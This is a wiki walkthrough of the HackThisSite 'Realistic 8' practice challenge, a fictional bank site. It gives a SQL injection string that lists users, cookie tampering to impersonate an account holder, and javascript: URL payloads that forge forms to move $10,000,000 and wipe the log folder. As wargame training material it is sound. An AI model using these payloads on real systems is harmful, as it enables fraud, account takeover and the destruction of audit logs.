Hackthissite/Realistic/Level8

From aldeid
Jump to navigation Jump to search
  • Level: Realistic::8 (United Banks Of America)
  • URL: http://www.hackthissite.org/missions/realistic/8/
  • Difficulty :
  • Exercise: One of America's Richest Men plans to donate $10,000,000 to a campaign set on hunting down hackers and locking them up. Please, if you can't do this, then we're all screwed. Can you hack in and move the money?

Message: Hey man, you gotta help me out, Gary Hunter, one of the richest men in America, has just deposited $10,000,000 into his bank account at the United Banks Of America and plans to donate that money to a campaign to hunt down and lock up all hackers. Now I've tried hacking their site but I'm just not good enough. That's why I need your help, Here's a list of your objectives:

  1. Find the account of Gary Hunter (I don't know his account name).
  2. Move the $10,000,000 into the account dropCash.
  3. Clear The Logs, They're held in the folder 'logFiles'.

I really hope you can do this, because if you can't we're all screwed

  • Solution:

Information

From the navigation and source code of pages, we gather following information:

Description Page Fields
Register pages Register.php > register2.php
  • <input type="text" name="username" maxlength=10>
  • <input type="password" name="password" maxlength=50>
  • <textarea name="desc" rows=5 cols=20 maxlength=255>
Login pages login1.php > login2.php
  • <input type="text" name="username" value="Enter Username">
  • <input type="password" name="Password" value="">
Purge files cleardir.php <input type='hidden' name='dir' value='loginSQLFiles'>
Transfer money from one account to another movemoney.php
  • <input type='text' name='TO' value='Username To Give Money To'>
  • <input type='text' name='AMOUNT' value='Amount Of Money To Move'>

Authentication cookie (created after successful authentication):

  • accountUsername=<login>
  • accountPassword=<password>

Our target:

  • Name: Garry Hunter
  • Transfer $10,000,000 into the account dropCash.
  • Log directory: logFiles

Objective 1: Find the account of Gary Hunter

First create your own account and log in. Once done, type following command in the url bar: javascript:alert(document.cookie); It shows our cookie value, indicating that the site is vulnerable. Then connect to user info page and enter a SQL injection to show the list of all users: ' or 'a'='a.

By scrolling down, we find:

GaryWilliamHunter : -- $$$$$ --

The 2 values are separated by a colon:

  • Before colon: the login (GaryWilliamHunter)
  • After colon: the description (-- $$$$$ --)

Objective 2: Move the $10,000,000 into the account dropCash

By entering following code in the URL, we see that the site is vulnerable to cookie injection because it displays in clear cookie information.

javascript:alert(document.cookie);

Install Firebug and Firecookie for Firefox. We then have to change value of cookie named "accountUsername" to "GaryWilliamHunter" and use following JS injection (copy/paste in the URL):

javascript:void(document.write('<form method=post action=movemoney.php><input type=hidden name=TO value=dropCash /><input type=hidden name=AMOUNT value=10000000 /><input type=submit value=transfer /></form>'))

It will dynamically write a form on the page, containing necessary values for a transfer:

  • FORM ACTION: movemoney.php, as specified in the exercise
  • FROM: value taken from the modified cookie (GaryWilliamHunter)
  • TO: value of dropCash, as stated in the exercise. We know this field from the information we gathered.
  • AMOUNT: value specified in the exercise. We know this field from the information we gathered.

By validating the form, it will complete the stage.

Objective 3: Clear The Logs, They're held in the folder 'logFiles'

Copy/paste following code in the URL:

javascript:void(document.write('<form method=post action=cleardir.php><input type=hidden name=dir value=logFiles /><input type=submit value="cover my tracks" /></form>'))

Comments